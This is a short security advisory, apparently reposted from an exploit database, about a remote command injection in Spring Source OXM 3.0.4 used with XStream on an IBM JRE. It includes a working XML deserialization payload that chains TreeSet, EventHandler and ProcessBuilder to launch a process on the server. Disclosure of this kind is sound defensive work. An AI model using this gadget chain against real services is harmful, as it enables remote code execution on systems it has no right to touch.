Spring Source OXM 3.0.4 Command Injection

2011.07.06
Credit: Pierre Ernst, IBM Canada, Business Analytics
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Reference: http://static.springsource.org/spring/docs/3.0.x/spring-framework-reference/html/oxm.html#d0e26722 Product: Spring Source OXM (Object/XML Mapping) Vendor: VMware Vulnerable Version: 3.0.4 only when XStream and IBM JRE are used Status: Fixed Vendor Notification: 12 October 2010 Vendor Fix: 20 October 2010 Vulnerability Type: Remote OS Command Injection (CAPEC-88) Credit: Pierre Ernst, IBM Canada, Business Analytics CVSS: 7.6 AccessVector: Network AccessComplexity: High Authentication: None Confidentiality Impact: Complete Integrity Impact: Complete Availability Impact: Complete Details: Consider a service accepting XML input to be unmarshalled as an instance of the Bicycle class. This is an example of legitimate input: <bicycle> <name>unicycle</name> <id>123</id> <nbrWheels>1</nbrWheels> <nbrRiders>1</nbrRiders> </bicycle> This malicious input will execute the notepad application on the server and open the C:\Windows\win.ini file <bicycle class="java.util.TreeSet"> <no-comparator /> <object /> <dynamic-proxy> <interface>java.lang.Comparable</interface> <handler class="java.beans.EventHandler"> <target class="java.lang.ProcessBuilder"> <command> <string>notepad.exe</string> <string>c:\windows\win.ini</string> </command> </target> <action>start</action> </handler> </dynamic-proxy> </bicycle>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top